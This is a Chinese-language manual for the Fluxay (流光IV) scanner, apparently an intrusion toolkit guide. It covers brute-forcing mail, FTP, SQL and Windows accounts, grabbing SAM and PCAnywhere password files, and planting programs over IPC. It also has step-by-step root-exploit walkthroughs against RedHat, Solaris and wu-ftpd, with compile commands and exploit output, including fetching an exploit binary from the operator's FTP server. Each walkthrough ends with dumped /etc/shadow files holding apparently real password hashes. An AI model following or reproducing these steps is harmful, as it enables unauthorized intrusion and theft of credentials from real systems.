扫描器流光FLUXAY5的使用方法.doc

扫描器流光FLUXAY5的使用方法一、 新增功能流光IV的高级扫描是和以前版本相比增加的最重要功能之一，包括了如下扫描功能:PORTS(常用端口、自定义端口）POP3（Banner、特定版本漏洞、暴力模式）FTP（Banner、特定版本漏洞、暴力模式）SMTP（Banner、特定版本漏洞、暴力模式）IMAP（Banner、特定版本漏洞、暴力模式）TELNET（Banner、特定版本漏洞）CGI（Banner、Unix/NT自动识别、ErrorPage检测、规则库可手工加入）SQL（通过漏洞扫描、暴力模式）IPC(NETBIOS)（获得用户列表、共享列表、暴力模式）IIS（IIS漏洞）FINGER（Finger漏洞扫描）RPC（Unix Finger漏洞扫描，获得用户列表）MISC（Bind 版本、MySql弱密码扫描)PLUGIN(可以方便地增加对某种类型漏洞的扫描）流光IV和以往版本相比增加(修改)了如下功能:IIS Remote Shell (修改, Remote Execute A-F)IPC Pipe Remote Shell (新增)IPC 植入者 （新增）SQL Remote Shell （修改）PC AnyWhere 解码 （新增）支持HTTP Basic/Negotiate/NTLM方式认证 (新增）IPC探测 （修改）IMAP探测 （新增）二、基本使用方法从探测-高级扫描功能启动。1、设定扫描的范围起始地址/结束地址：需要扫描的IP地址范围。 目标系统：ALL-所有系统 NT-NT2000系统 UNIX-UNIX系统，根据选择的不同下面的检测项目将会有不同设置。 获取主机名：获取主机的名称。 检测项目：选择需要扫描的项目，根据选择的不同表单会有所不同。 2、端口扫描标准端口扫描：包括常用的服务端口扫描 自定端口扫描：范围从1-65534 3、POP3扫描获取POP3版本信息：取得Banner 尝试猜解用户：根据选项中的设置对常见用户名进行暴力模式猜解。 4、FTP扫描获取FTP版本信息：取得Banner 尝试匿名登陆：测试FTP服务器能否匿名登陆 尝试猜解用户：根据选项中的设置对常见用户名进行暴力模式猜解。 5、SMTP扫描获取SMTP版本信息：取得Banner EXPN/VRFY扫描：通过SMTP的EXPN/VRFY验证用户是否存在。 6、IMAP扫描获取IMAP版本信息：取得Banner 尝试猜解用户帐号：根据选项中的设置对常见用户名进行暴力模式猜解。 7、TELNET扫描获取TELNET版本信息：取得Banner 8、CGI扫描获取WWW版本信息：取得Banner 根据版本决定采用NT或者UNIX方式：根据www的版本信息，在扫描的时候自动选择NT规则库或者UNIX规则库。 支用HTTP 200/502有效：为了避免不必要的误报，只有HTTP返回200(OK)/502(Gateway Error)才认为有效。流光IV中CGI扫描采用了Error_Page陷阱检测技术，使得一些采用了Error_Page的主机也能够被正常扫描到，这一点是目前几乎所有的CGI扫描器所不具备的。 9、CGI Rule设置类型选择：可以选择ALL、NT、UNIX，如果在CGI中选择了根据版本决定采用NT或者UNIX方式此项通常无需更改。 漏洞列表：默认扫描列表中的所有规则（全部选中），也可以根据需要只对某一个漏洞或者某几个漏洞进行扫描（仅选择需要的规则即可）。CGI规则可以根据需要自行扩展，扩展的方法见CGI规则的扩展一节。 10、SQL尝试通过漏洞获得密码：根据IIS的漏洞获得SQL的连接密码。 对SA密码进行猜解：根据选项中的设置对SA密码进行暴力模式破解。 11、IPC空连接(NULL Session)扫描：尝试和远程主机建立空连接，所谓空连接就是创建一个用户名和密码都为空的访问令牌。 扫描共享资源：扫描网络中的共享资源。共享资源在98MENT2000中都存在，所不同的在于访问98ME中共享资源通常无需提供任何凭证（也就是任何人都可以访问）；访问NT2000中的共享资源通常需要提供一个访问凭证（即需要有一个用户名和密码）。流光IV会对这两种不同的资源进行区分。 尝试获取用户名：NT2000在默认安装的情况下可以通过空连接获取目标主机的用户名。 尝试对获取的用户名进行猜解：对获得用户名根据选项中的设置进行暴力模式破解。NT在通过IPC建立连接的时候，在同一时间只允许和一台主机建立一个连接，这样以来多线程就毫无用处。不过如果NT如果同时提供了MSFTP服务就可以通过FTP对用户进行告诉猜解（因为FTP没有同一时间只允许一个连接的限制），流光IV可以自动根据情况选择IPC或者FTP模式的猜解。 仅对Administrators组进行猜解：对获得的用户名进行判断，仅仅对属于Administrators组的用户进行上述猜解。 12、IISUnicode编码漏洞：尝试6种方法(Remoe Execute A-F)扫描Unicode编码漏洞。 FrontPage扩展：扫描是否安装了Frontpage扩展。如果安装了Frontpage扩展，也可以采用HTTP扫描中的NTLM模式对NT系统帐号进行高速猜解。共享资源在98MENT2000中都存在，所不同的在于访问98ME中共享资源通常无需提供任何凭证（也就是任何人都可以访问）；访问NT2000中的共享资源通常需要提供一个访问凭证（即需要有一个用户名和密码）。流光IV会对这两种不同的资源进行区分。 尝试获取SAM文件：NT2000的密码文件存在于SAM文件中，如果获得了SAM文件就可以在本地利用L0pht(下载)进行破解。 尝试获取PcAnyWhere密码文件：尝试获取PcAnyWhere密码文件，获得后，可以用流光IV中工具进行解码（不是暴力破解）。13、Finger扫描Finger功能：利用Finger功能可以测试某个用户是否存在。 对Sun OS尝试获得用户列表：Sun OS的Finger功能由一个特点，可以列出最近登陆的用户名。在FTPPOP3IMAP扫描中也会首先进行Finger的测试，如果测试成功就会用获得用户名列表来代替选项中的用户名字典。 14、RPC扫描RPC服务：扫描RPC服务，得到服务的ID的信息。UNIX中的RPC是漏洞比较多的服务之一，特别是SunOS。 15、MISCBIND版本扫描：扫描BIND服务，得到版本信息。 猜解MySQL密码：MySQL是UNIX中一种很常见的免费数据库（一般国内常见的模式是NT+IIS+MSSQL/UNIX+Apache+MySQL)，得到了MySQL的密码就可以查阅数据库中的所有内容。16、PLUGINS类型：ALL、NT、UNIX。 PlugIn列表：列出当前安装的所有PlugIn的信息。流光IV中的PlugIn是一项很有用的功能，可以很方便地利用现有流光的扫描框架进行扩展。关于Plugin的具体信息，请参见如何编写流光IV的插件。 17、选项猜解用户名字典：设置扫描中采用的用户字典，适用于POP3/FTP/IMAP/SQL/MYSQL。 猜解密码字典：设置扫描中采用的密码字典，适用于POP3/FTP/IMAP/SQL/MYSQL。 保存扫描报告：扫描的报告，采用HTML格式。 并发线程数目：默认80，可以根据情况增减，如果线程数目越大速度越快但是越容易误报和漏报。 网络选项：设置TCP参数 TCP连接超时：建立TCP连接时的超时设置，默认10秒(10000毫秒) TCP数据超时：收发数据时的超时设置如果建立连接或收发数据时出现了超时，则说明连接收发数据失败。通常TCP超时设置小，扫描速度就越快，但是就越容易漏报。如果设置太大，扫描的速度会变慢，但是漏报就比较少。具体的设置，需要根据自己的的网络状况决定。一、可以直接测试的部分流光IV高级扫描完成后，会产生一个扫描报告，此外一部分扫描结果也会在界面上得到直接的反映。1、IPC对于IPC的扫描结果，可以直接在上面点左键，出现连接.字样，选择执行。这时出现了NTCMD的界面，NTCMD如果连接成功具有System权限，可以执行命令，例如创建帐号等。关于IPC的更多信息请参见流光2000IPC使用说明。2、SQL选择连接.出现SQL Shell的界面。如果没有安装SQL Server,那么对方主机必须允许建立空连接才能够连接成功(默认安装Express版,所以首先需要安装SqlRcmd Normal版,在SqlRcmdNormal中)。为了让流光IV的SQL扫描发挥最大作用，建议安装SQL Server。通常情况下，SQLCMD具有System权限，可以执行命令。如果SQL Server是以用户身份启动，那么就具有启动用户身份的权限。如果需要将数据库的数据导出，通常需要安装SQL Server。3、FTP同上述方法，流光IV会自动调用系统的FTP程序。4、IIS Remote Execute -X选择连接.,出现一个设置的对话框如果在使用中出现问题，请取消选择允许IIS检测CMD。通常情况下IIS Remote Execute具有IUSR_ComputerName帐号权限。5、Remote FTP PCAnyWhere密码文件使用此功能必须首先拥有一个具有写权限的FTP服务器，以便流光IV将密码文件上传。出现上传FTP服务器设置的对话框。如果上传失败(流光IV本身不能确认是否上传成功)，请选择禁止IIS检测CMD。上传成功之后，就可连接到自己指定的FTP的服务器，将文件下载到本机，利用流光IV中PCAnyWhere解码工具解码。这样就可以通过PCAnyWhere连接管理远程主机了。6、FrontPage 扩展如果扫描到FrontPage扩展，也可以用来暴力破解NT系统帐号(当然这种方法没有直接通过MSFTP快)。(1)、首先通过IPC得到用户列表(具体方法参见流光2000IPC探测说明)(2)、加入HTTP主机注意后面的URL不要敲错。(3)、从IPC主机导入(4)、选择需要探测的用户(5)、加入字典后开始扫描注意在HTTP的NTLM和Negotiate模式中只能开启一个线程。7、IIS5 .Printer可以使用IIS5Hacker测试。二、其他部分1、IPC种植者如果获得了NT/2000机器的Administrators组的密码，也可以通过IPC种植者上传和执行程序（利用Schedule服务和IPC管道）。从工具-NT/IIS-种植者启动程序。设置好所需项目后，按开始即可上传和制定的程序(当程序复制完之后，大约需要一分钟后程序才会启动)。2、MySQLMySQL是UNIX中最常用的免费数据库，流光IV可以检测到MySQL的弱密码。通过MySQL的客户端程序()连接远程数据库即可查阅数据库的所有信息。关于MySQL的相关信息请查阅相关资料。三、UNIX的本地溢出UNIX的本地溢出，需要由一个具有Shell权限的帐号，通常情况下这一帐号通过弱密码得到。弱密码可以通过FTP扫描或POP3扫描得到。所有关于UNIX的溢出测试，均需要由一个UNIXLinux的环境进行编译。1、Example of RedHat 6.2 SU通过Telnet连接到远程主机(推荐用Secure CRT，在流光IV的安装目录中有)。Linux RedHat 6.2 Local ExploitKernel 2.2.14-6.1 on an i686login: serverPassword:serverWebServer5 server$vi su.cserverWebServer5 /tmp$ gcc -o su su.cserverWebServer5 /tmp$ ./susu exploit by XP Enjoy!Phase 1. Checking paths and write permisionsChecking for /usr/bin/msgfmt.OkChecking for /usr/bin/objdump.OkChecking write permisions on /tmp.OkChecking read permisions on /bin/su.OkChecking for a valid language. using af_ZA OkChecking that /tmp/LC_MESSAGES does not exist.OkPhase 2. Calculating eat and pad values.doneeat = 120 and pad = 2Phase 3. Creating evil libc.mo and setting enviromentvarsPhase 4. Getting address of .dtors section of /bin/su.done.dtors is at 0x0804bd3cPhase 5. Compiling suid shell/tmp/xp created OkPhase 6. Executing /bin/su- Entering rootshell ;-) -bash# iduid=0(root) gid=0(root) groups=504(server)bash# cat /etc/shadowroot:$1$CmIRSoFn$i6/jI1F5jOCYZK21PH3Rl1:11312:0:99999:7:-1:-1:134539268bin:*:11288:0:99999:7:daemon:*:11288:0:99999:7:adm:*:11288:0:99999:7:lp:*:11288:0:99999:7:sync:*:11288:0:99999:7:shutdown:*:11288:0:99999:7:halt:*:11288:0:99999:7:mail:*:11288:0:99999:7:news:*:11288:0:99999:7:uucp:*:11288:0:99999:7:games:*:11288:0:99999:7:gopher:*:11288:0:99999:7:nobody:$1$YFv8hmgw$gr3suN6DxqqLUswxVJ49M.:11452:0:99999:7:-1:-1:134540196xfs:!:11288:0:99999:7:named:!:11288:0:99999:7:gdm:!:11288:0:99999:7:piranha:!:11288:0:99999:7:pvm:!:11288:0:99999:7:navy:$1$3H4IuGc7$8r3rutBAdVDtOPnVmwrTw1:11288:-1:99999:-1:-1:-1:135664172vip:$1$hle0b0Lj$923zX.laFy.h/3r42PhwI0:11312:-1:99999:-1:-1:-1:134540356sg:!:11312:0:99999:7:intel:$1$WfhnTH3y$JDDa31e/UF2CCpcx8zFjA0:11367:0:99999:7:-1:-1:134540356server:$1$6K.xS5bT$u0jAZWbNpq26jDA77b508/:11386:0:99999:7:-1:-1:134539252leaf:$1$Y8k81DPb$GQa54KyUUHHdLqcQTG6Fw0:11446:0:99999:7:-1:-1:134540308operator:$1$uDR7PcOE$7pl2urVWKxGCVogueZFlC0:11452:0:99999:7:-1:-1:134540332bash# 2、Example of Sun OS Local Exploit对于SunOS的系统同样可以用本地溢出，首先需要做的仍然是得到一个普通帐号。用流光IV中高级扫描功能扫描某网段，其中得到这样的结果：Finger扫描Finger开放 得到用户列表 Login daemon bin sys zhxg gydan xumengxi zhangzheng gyd zzs zy liulang webmaster vet vet120FTP扫描FTP版本信息: www FTP server (SunOS 5.6) ready.从结果可以看出，通过Sun的Finger得到了用户列表，同时主机的FTP开放，我们不妨用流光IV的FTP扫描试试。将主机加入FTP树型列表中，这一次我们不用指定用户列表，可以直接通过Finger获得。在主机上点右键-探测-Sun Solaris用户列表。经过简单模式探测后，得到了两个帐号。通过ScreCRT登陆上去。Sun Solaris 5.6 Sparc Local lpset ExploitSunOS 5.6login: webmasterPassword:Last login: Fri May 18 16:50:20 from 22Sun Microsystems Inc. SunOS 5.6 Generic August 1997% uname -aSunOS 5.6 Generic_105181-16 sun4u sparc SUNW,Ultra-2 /确定系统为Sun Solaris 2.6 S% cd /% lsdf.mon last_uuid llbdbase.dat ps_data % ftp xxx.xxx.xxx /从FTP服务器下载编译好的溢出程序(因为通常的Solaris默认安装没有gcc编译器)Connected to .220 ProFTPD 1.2.1 Server (Virtual Hosting) xxx.xxx.xxxName (:liujy): xxxxxxx331 Password required for xxxxxx.Password:ftp bin200 Type set to I.ftp ftp get lpset200 PORT command successful.150 Opening BINARY mode data connection for lpset (26148 bytes).226 Transfer complete.local: lpset remote: lpset26148 bytes received in 2.1 seconds (12.13 Kbytes/s)ftp quit221 G% lsdf.mon last_uuid llbdbase.dat lpset ps_data % chmod 777 lpset /修改文件属性为可执行% ./lpsetcopyright LAST STAGE OF DELIRIUM apr 2000 poland //usr/bin/lpset for solaris 2.6 2.7 sparcFNS for files is not installedCannot use this command in this environmentUse: fncreate -t org command to install#/获得Root四、UNIX的远程溢出除了本地溢出之外，远程溢出也是一种常见的手段。1、Example of Sun Solaris 5.7/5.8 Sparc RPC.snmpRPC ScanRPC Program ID snmp UDP Sun solaris Sparc 7.0/8.0 Gain Root Shell如果出现这样的结果，说明对方系统的RPC中存在一个snmp服务。多数的Sun Solaris 5.7/5.8都存在远程溢出。可以利用流光IV中附带的程序进行测试。Example of Sun Solaris 5.7 Sparc RCP.snmprootcodeguru /root# gcc -o snmp snmp.csnmp.c: In function main:snmp.c:181: warning: passing arg 3 of pointer to function from incompatible pointer typesnmp.c:181: warning: passing arg 4 of pointer to function from incompatible pointer typesnmp.c:181: warning: passing arg 5 of pointer to function from incompatible pointer typerootcodeguru /root# ./snmp xxx.xxx.xxx.xxx -v 7copyright LAST STAGE OF DELIRIUM mar 2001 poland //snmpXdmid for solaris 2.7 2.8 sparcadr=0x000c8f68 timeout=30 port=928 connected!sent!SunOS app1-stg-bk-sh 5.7 Generic_106541-09 sun4u sparc SUNW,Ultra-80iduid=0(root) gid=0(root)cat /etc/shadowroot:N7lNfoCK/LVW.:11450:daemon:NP:6445:bin:NP:6445:sys:NP:6445:adm:NP:6445:lp:NP:6445:uucp:NP:6445:nuucp:NP:6445:listen:*LK*:nobody:NP:6445:noaccess:NP:6445:nobody4:NP:6445:support:k8ecFpmVkUwDQ:11450:oracle8i:68sOUP5lvdTss:11450:demo:nUqGaO3SmGZr6:11209:bvdemo:CW3HfM/tcoDj2:11209:ib:x9Sao83hvYXyo:11450:bvib:RBJrjMS5gHLFw:11450:bol-ftp:/uOkO0iTpbRhg:11340:iaspec:fCE/zZLpsffGU:11388:bol:M95prTyCJKzog:11450:sz-ftp:SwIE7UoRBG5tc:11340:lads:OmM2BckxLzMLQ:11450:ladsopr:SW027tVoxRjK6:11361:ladsspt:*LK*:ladsbol:SjJHo6AY3iueI:11464:bvbol:vAyIPXTnrYP9s:11450:csj:11340:lkm:eQkjbp7D5iOxY:11466:guest:0cnYwPC4533Is:11415:ib-ftp:Sx/4GQ.nS2Gq6:11416:hychan:XlalBrtew73hE:11423:sysadm:ph/7McY7xSRO6:11431:xshen:CVxLVj3rTP1fo:11432:xbli:fV9yTyz5Q8qdY:11432:qzhu:3XLhGf7bzFWPo:11432:jhtan:cXC/60E44Ojd2:11432:yhpan:3Yrzw7j4D4aEk:11432:sxzhou:UQcddGFe2pMpU:11450:rootcodeguru /root#RPC.snmp只能够溢出成功一次（在重启之前）。2、Example of Sun Solaris 5.6 Sparc RPC.ttdbRPC ScanRPC Program ID ttdb UDP Sun solaris Sparc 7.0/8.0 Gain Root Shell如果出现这样的结果，说明对方系统的RPC中存在一个ttdb服务。多数的Sun Solaris 5.6都存在远程溢出。可以利用流光IV中附带的程序进行测试。Example of Sun Solaris 2.6 (Sparc) RPC.ttdbrootcodeguru /root# gcc -o ttdbserver ttdbserver.cttdbserver.c: In function main:ttdbserver.c:202: warning: passing arg 3 of pointer to function from incompatible pointer typettdbserver.c:202: warning: passing arg 4 of pointer to function from incompatible pointer typettdbserver.c:202: warning: passing arg 5 of pointer to function from incompatible pointer typerootcodeguru /root# ./ttdbserver xxx.xxx.xxx.xxx -v 6copyright LAST STAGE OF DELIRIUM jul 1998 poland //rpc.ttdbserverd for solaris 2.3 2.4 2.5 2.5.1 2.6 sparcadr=0xeffffaf8 timeout=10 port=1000 connected! sent!SunOS idc1 5.6 Generic_105181-05 sun4u sparc SUNW,Ultra-1iduid=0(root) gid=0(root)cat /etc/shadowroot:4LHCYj9LnG/GU:11415:daemon:NP:6445:bin:NP:6445:sys:NP:6445:adm:NP:6445:lp:NP:6445:smtp:NP:6445:uucp:NP:6445:nuucp:NP:6445:listen:*LK*:nobody:NP:6445:noaccess:NP:6445:nobody4:NP:6445:test:rLtlmW2gxKBdA:yhr:aeqB9KuKlrQ7A:3、Example of RedHat 7.0 LPD Remote Exploit在扫描中发现有一主机是RedHat 7.0，并且LPD开放(515)，就可能存在远程溢出。Example of RedHat 7.0(Guinesss) LPD Remote Exploitrootcodeguru /root# gcc -o rh7 rh7.crootcodeguru /root# ./rh7 xxx.xxx.xxx.xxx brute -t 0+ Security.is remote exploit for LPRng/lpd by DiGiT+ Exploit information+ Victim: 54+ Type: 0 - RedHat 7.0 - Guinesss+ Eip address: 0xbffff3ec+ Shellcode address: 0xbffff7f2+ Position: 300+ Alignment: 2+ Offset 0+ Attacking 54 with our format string+ Brute force man, relax and enjoy the ride ;+ The eip_address is 0xbffff3dc- + shell located on 54- + Enter Commands at willLinux TestserverIDC 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000 i686 unknownuid=0(root) gid=7(lp)cat /etc/shadowroot:$1$jZG8ly2R$NB4gz4sh6hOApy4yiWU1o0:11466:0:99999:7:bin:*:11466:0:99999:7:daemon:*:11466:0:99999:7:adm:*:11466:0:99999:7:lp:*:11466:0:99999:7:sync:*:11466:0:99999:7:shutdown:*:11466:0:99999:7:halt:*:11466:0:99999:7:mail:*:11466:0:99999:7:news:*:11466:0:99999:7:uucp:*:11466:0:99999:7:operator:*:11466:0:99999:7:games:*:11466:0:99999:7:gopher:*:11466:0:99999:7:ftp:*:11466:0:99999:7:nobody:*:11466:0:99999:7:apache:!:11466:0:99999:7:named:!:11466:0:99999:7:xfs:!:11466:0:99999:7:rpcuser:!:11466:0:99999:7:rpc:!:11466:0:99999:7:mailnull:!:11466:0:99999:7:test:$1$gAgsH4t2$awaQQex41ADhW0mFku1Vc/:11466:0:99999:7:lird:$1$DO7WFJue$t/EQHFkatCEavYkeb4n.S0:11466:0:99999:7:r00t:11469:0:99999:7:-1:-1:134523584xar:11469:0:99999:7:-1:-1:1345235844、WUFTP 2.6.0 Remote Exploit扫描中出现出现这样的结果，说明对方的FTP采用wuftp 2.6.0，并且允许匿名登陆，一般都有远程溢出。FTP扫描FTP版本信息: wu-2.6.0 RedHat 6.x WuFtpd 2.6.0 远程溢出 匿名 允许匿名登录Example of WUFTP 2.6.0 Remote Exploitrootppgzdev04 /tmp# tar -zxvf 7350wu-v5.tar.gz /首先解包7350wu/7350wu/7350wu.c7350wu/common.c7350wu/network.c7350wu/common.h7350wu/network.h7350wu/Makefilerootppgzdev04 /tmp# cd 7350wu /进入解压缩后的目录rootppgzdev04 7350wu# make /编译cc -Wall -g -c -o common.o common.ccc -Wall -g -c -o network.o network.ccc -Wall -g -o 7350wu 7350wu.c common.o network.orootppgzdev04 7350wu# ./7350wu -h xxx.xxx.xxx.xxx /执行7350wu - wuftpd = 2.6.0 x86/linux remote root (mass enabled)by team tesophase 1 - login. login succeededphase 2 - testing for vulnerability. vulnerable, continuingphase 3 - finding buffer distance on stack. #found: 1100 (0x0000044c)phase 4 - finding source buffer address. #found: 0xbfffdd3dphase 5 - find destination buffer address. #found: 0xbfffb0e0phase 6 - calculating return addressretaddr = 0xbfffdf25phase 7 - getting return address locationfound 0xbfffd0e4phase 8 - exploitation.using return address location: 0xbfffd0e4len = 51074514211817513660947028668510222160622076404425037294968863449191234404352 3616611 1934652240uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp) /root shellcat /etc/shadowroot:$1$OXGqOw6H$yg9RTf7UOaBzeXPy.izAp.:11350:0:99999:7:-1:-1:134540356bin:*:11317:0:99999:7:daemon:*:11317:0:99999:7:adm:*:11317:0:99999:7:lp:*:11317:0:99999:7:sync:*:11317:0:99999:7:shutdown:*:11317:0:99999:7:halt:*:11317:0:99999:7:mail:*:11317:0:99999:7:news:*:11317:0:99999:7:uucp:*:11317:0:99999:7:operator:*:11317:0:99999:7:games:*:11317:0:99999:7:gopher:*:11317:0:99999:7:ftp:*:11317:0:99999:7:nobody:*:11317:0:99999:7:xfs:!:11317:0:99999:7:named:!:11317:0:99999:7:postgres:!:11317:0:99999:7:awl:$1$4m3CB/Oh$kA0FaQ8.P.lAKxsdWPvn20:11317:0:99999:7:-1:-1:134539276asong:$1$gLOrMFBY$84bgt.SULcU9WqjkaFDb80:11337:0:99999:7:-1:-1:134540308legend:$1$wj.fZ7CK$9taKrU2oVFfpaFHWSqUCw.:11350:0:99999:7:-1:-1:134540332leaf:$1$4UWppiGU$FwPcc/LOgJEVTK89is9uy1:11365:0:99999:7:-1:-1:134540308四、其他由于测试击的方式多种多样，但是方法大多大同小异，例如RPC.Status、Bind等等。一、CGI扩展流光IV中CGI规则库很容易进行扩展，对应于NT和UNIX的CGI规则库分别在流光IV安装目录下名为ntcgi.dat和unixcgi.dat。增加规则的时候只需要用notepad打开对应的文件，将规则加入即可。二、Plugins流光IV中实现了一些简单的Plugins，对于一些简单的漏洞规则可以很容易加入其中。流光IV中所有的Plugins都放在安装目录中的plugins目录下，扩展名为.flux。我们用一个例子来具体说明Plugins的具体写法。Example of IIS5.Printer Plugin/是为了说